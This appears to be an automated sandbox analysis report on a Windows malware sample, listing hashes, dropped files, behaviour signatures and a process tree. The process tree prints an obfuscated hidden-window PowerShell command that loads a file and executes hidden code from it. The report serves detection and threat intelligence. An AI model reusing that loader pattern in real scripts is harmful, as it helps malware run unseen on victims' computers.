Analysis
-
max time kernel
122s -
max time network
123s -
platform
windows7_x64 -
resource
win7-20240903-en -
resource tags
arch:x64 arch:x86 image:win7-20240903-en locale:en-us os:windows7-x64 system -
submitted
22-10-2024 16:08
Static task
static1
Behavioral task
behavioral1
Sample
Miljpaavirkningen.exe
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
Miljpaavirkningen.exe
Resource
win10v2004-20241007-en
Behavioral task
behavioral3
Sample
Kreditnotaens/Plettes.ps1
Resource
win7-20240729-en
Behavioral task
behavioral4
Sample
Kreditnotaens/Plettes.ps1
Resource
win10v2004-20241007-en
General
-
Target
Miljpaavirkningen.exe
-
Size
895KB
-
MD5
0327d3ca2373bdcfad29ae18a7554884
-
SHA1
92ce0598c98f0ddc2ae136491f0e988ddcf29d49
-
SHA256
eb60de90ee98dcc76c344d75d96f2eb72bd4466a504f2668a660ec928abf07e1
-
SHA512
efdd810fab7b956116a99ba2d78e723474e14343c8cd5cde01ae8cb61a441aad14f516a151c530b42b7b8b1760405ca87c9415cbf53a541190c92e2250c751ee
-
SSDEEP
12288:N5e/L/ujA9jjzAmiTs3QCXDzo3vKz/oByv268ODurlKRFP7Pytafm6wY8yujWX6d:abu0wmt43w/9268OD6lm7Pytae6/B1G5
Malware Config
Signatures
-
Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs
Runs PowerShell with the display window hidden.
Processes:
pid  process
1784  powershell.exe
2348  powershell.exe
-
Drops file in Windows directory 4 IoCs
Processes:
description  ioc  process
File opened for modification  C:\Windows\resources\Nebengeschfter.ini  Miljpaavirkningen.exe
File opened for modification  C:\Windows\resources\0409\gildes.lak  Miljpaavirkningen.exe
File opened for modification  C:\Windows\Fonts\thyrididae.ini  Miljpaavirkningen.exe
File opened for modification  C:\Windows\resources\0409\diaspidine.Inq  Miljpaavirkningen.exe
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 3 IoCs
Attempts to gather information about the system language of a victim in order to infer the geographical location of that host.
Processes:
description  ioc  process
Key opened  \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language  Miljpaavirkningen.exe
Key opened  \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language  powershell.exe
Key opened  \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language  powershell.exe
-
Suspicious behavior: EnumeratesProcesses 2 IoCs
Processes:
pid  process
1784  powershell.exe
2348  powershell.exe
-
Suspicious use of AdjustPrivilegeToken 2 IoCs
Processes:
description  pid  process
Token: SeDebugPrivilege  1784  powershell.exe
Token: SeDebugPrivilege  2348  powershell.exe
-
Suspicious use of WriteProcessMemory 8 IoCs
Processes:
description  pid  process  target process
PID 2440 wrote to memory of 1784  2440  Miljpaavirkningen.exe  powershell.exe
PID 2440 wrote to memory of 1784  2440  Miljpaavirkningen.exe  powershell.exe
PID 2440 wrote to memory of 1784  2440  Miljpaavirkningen.exe  powershell.exe
PID 2440 wrote to memory of 1784  2440  Miljpaavirkningen.exe  powershell.exe
PID 2440 wrote to memory of 2348  2440  Miljpaavirkningen.exe  powershell.exe
PID 2440 wrote to memory of 2348  2440  Miljpaavirkningen.exe  powershell.exe
PID 2440 wrote to memory of 2348  2440  Miljpaavirkningen.exe  powershell.exe
PID 2440 wrote to memory of 2348  2440  Miljpaavirkningen.exe  powershell.exe
Processes
-
Path (tree depth 1)
C:\Users\Admin\AppData\Local\Temp\Miljpaavirkningen.exe
Command line
"C:\Users\Admin\AppData\Local\Temp\Miljpaavirkningen.exe"
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2440 -
Path (tree depth 2)
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Command line
"powershell.exe" -windowstyle hidden "$Rustling=Get-Content -raw 'C:\Users\Admin\AppData\Local\peritonealizing\nomadeinvasioners\stofhandskernes\Kreditnotaens\Plettes.For';$Wheeping171=$Rustling.SubString(53402,3);.$Wheeping171($Rustling)"
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1784 -
Path (tree depth 2)
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Command line
"powershell.exe" -windowstyle hidden "$Rustling=Get-Content -raw 'C:\Users\Admin\AppData\Local\peritonealizing\nomadeinvasioners\stofhandskernes\Kreditnotaens\Plettes.For';$Wheeping171=$Rustling.SubString(53402,3);.$Wheeping171($Rustling)"
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2348
Network
MITRE ATT&CK Enterprise v15
Downloads
-
Filesize
803B
MD5
47027ef7e3a1709e131ffb08a50b6be2
SHA1
1516a214287a748dd3e02d73d8373a0baeddf352
SHA256
4997726a61b3c10d6a7ed878463f680007b13dcd9533aa310b28888967d17d32
SHA512
90d60995db3dca664f59a3780e7b141bc66fee80034d0372e2e8e90baf6acbc6ed8ca6da25e8d937a24b4aec057c260762fd351e4dd73f1a7aa179a4d87298ff
-
Filesize
849B
MD5
68f169ee1b757b8cb3fd66b93b245af7
SHA1
79eca9a98803d71953c27c6a6768283ee4fc632e
SHA256
6a308dc4a480f127088ad672a858e09d50d64e63af14078136a80ba62c3dab69
SHA512
3655c18733e86e6011b7b33c24a4ce816d16197d958a4906790b2d94e979730c50a2f4d17a0037ccf0ed828cd403cb144eb913d80376355ded94752b43561d23
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
Filesize
7KB
MD5
5332cfad5e06f4af65d0cccf541224cf
SHA1
acaa9c5e63e880690fb03979b3a2e152db600a55
SHA256
b515fe43377ba9c68edf2f6ad21d150d7f5561fbdc23bd0bb634076243a8283f
SHA512
55c220f2e86dd69fbe12aaef80a86d9aa44564d1d6d41f040b3944ba73abdbc57f27b09f0c2b84ead6690db15977f14b3b95135ddca1ed3aac45812c23525dde
-
Filesize
32B
MD5
53898e643bd3e0ca22a462325ad62da4
SHA1
e0f08a75fa5219f39e49c1b9f361119905da7d02
SHA256
b947991000aea669ebfeadfb12de45121d46ad3dfd02296f373f9bf8ce4f1aff
SHA512
aa17b99a93a04f7bbbb92f34c15921da80e20592a39b3921f1d3cc59fae55f66196b2be4f56716846daff041253cb63d7e373b84234d451181c87f1d097fe8ca